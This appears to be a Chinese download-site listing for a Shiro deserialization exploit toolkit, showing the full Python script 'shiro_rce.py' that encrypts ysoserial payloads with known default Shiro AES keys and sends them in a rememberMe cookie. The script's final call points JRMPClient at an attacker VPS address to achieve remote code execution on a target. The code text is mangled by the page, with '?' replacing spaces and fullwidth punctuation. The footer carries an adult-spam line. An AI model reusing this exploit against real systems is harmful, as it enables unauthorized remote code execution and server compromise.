shiro反序列化復現.zip

大小: 44.12MB

文件類型: .zip

金幣: 1

下載: 0 次

發布日期: 2023-08-08
語言: 其他
標簽:

高速下載

資源簡介

shiro反序列化復現工具包；shiro反序列化復現工具包；

資源截圖

小圖大圖

代碼片段和文件信息

#coding:?utf-8
import?os
import?re
import?time
import?base64
import?uuid
import?subprocess
import?requests
from?Crypto.Cipher?import?AES
#JAR_FILE?=?‘ysoserial-master-SNAPSHOT.jar‘
JAR_FILE?=?‘ysoserial-0.0.6-SNAPSHOT-all.jar‘
keys?=?[‘Z3VucwAAAAAAAAAAAAAAAA==‘‘kPH+bIxk5D2deZiIxcaaaA==‘‘4AvVhmFLUs0KTA3Kprsdag==‘‘3AvVhmFLUs0KTA3Kprsdag==‘‘2AvVhdsgUs0FSA3SDFAdag==‘‘wGiHplamyXlVB11UXWol8g==‘‘fCq+/xW488hMTCD+cmJ3aQ==‘‘1QWLxg+NYmxraMoxAXu/Iw==‘‘ZUdsaGJuSmxibVI2ZHc9PQ==‘‘L7RioUULEFhRyxM7a2R/Yg==?‘‘6ZmI6I2j5Y+R5aSn5ZOlAA==‘‘r0e3c16IdVkouZgk1TKVMg==‘‘ZWvohmPdUsAWT3=KpPqda‘‘5aaC5qKm5oqA5pyvAAAAAA==‘‘bWluZS1hc3NldC1rZXk6QQ==‘‘a2VlcE9uR29pbmdBbmRGaQ==‘‘WcfHGU25gNnTxTlmJMeSpw==‘‘LEGEND-CAMPUS-CIPHERKEY==‘‘3AvVhmFLUs0KTA3Kprsdag==‘]
lis?=?[“BeanShell1““C3P0““Clojure““CommonsBeanutils1““CommonsCollections1““CommonsCollections2““CommonsCollections3““CommonsCollections4““CommonsCollections5““CommonsCollections6““FileUpload1““Groovy1““Hibernate1““Hibernate2““JBossInterceptors1““JRMPClient““JRMPListener““JSON1““JavassistWeld1““Jdk7u21““Jython1““MozillaRhino1““Myfaces1““Myfaces2““ROME““Spring1““Spring2““URLDNS““Wicket1“]
#keys?=?[‘4AvVhmFLUs0KTA3Kprsdag==‘‘‘]
def?poc（url?rce_commandkeyfunc）:
????if?‘://‘?not?in?url:
????????target?=?‘https://%s‘?%?url?if?‘:443‘?in?url?else?‘http://%s‘?%?url
????else:
????????target?=?url
????try:
????????payload?=?generator（rce_command?JAR_FILEkeyfunc）??#?生成payload
????????#print?payload
????????print?payload.decode（）
????????#exit（）
????????r?=?requests.get（target?cookies={‘rememberMe‘:?payload.decode（）}?timeout=10verify=False）??#?發送驗證請求
????except?Exception?e:
????????print（e）
????????pass
????return?False
def?generator（command?fpaeskeyfunc）:
????if?not?os.path.exists（fp）:
????????raise?Exception（‘jar?file?not?found!‘）
????
????popen?=?subprocess.Popen（[‘java‘?‘-jar‘?fpfunc?command]stdout=subprocess.PIPE）

????BS?=?AES.block_size
????pad?=?lambda?s:?s?+?（（BS?-?len（s）?%?BS）?*?chr（BS?-?len（s）?%?BS））.encode（）
????key?=?aeskey
????mode?=?AES.MODE_CBC
????iv?=?uuid.uuid4（）.bytes
????encryptor?=?AES.new（base64.b64decode（key）?mode?iv）
????file_body?=?pad（popen.stdout.read（））
????base64_ciphertext?=?base64.b64encode（iv?+?encryptor.encrypt（file_body））
????return?base64_ciphertext
poc（‘http://www.test.com‘‘114.118.80.138:12345‘keys[1]‘JRMPClient‘）???#www.test.com替換成目標主機的鏈接，114.118.80.138替換成自己VPS的地址

?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件??????446240??2019-08-03?16:08??shiro反序列化復現\pycrypto-2.6.1.tar.gz
?????文件????????2517??2019-08-03?23:31??shiro反序列化復現\shiro_rce.py
?????文件????50665493??2019-08-03?16:24??shiro反序列化復現\ysoserial-0.0.6-SNAPSHOT-all.jar
?????目錄???????????0??2019-08-03?23:32??shiro反序列化復現\

上一篇：Chemistry The Central Science
下一篇：量化分析最新的技術指導文獻

91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

shiro反序列化復現.zip

資源簡介

資源截圖

代碼片段和文件信息

評論

相關資源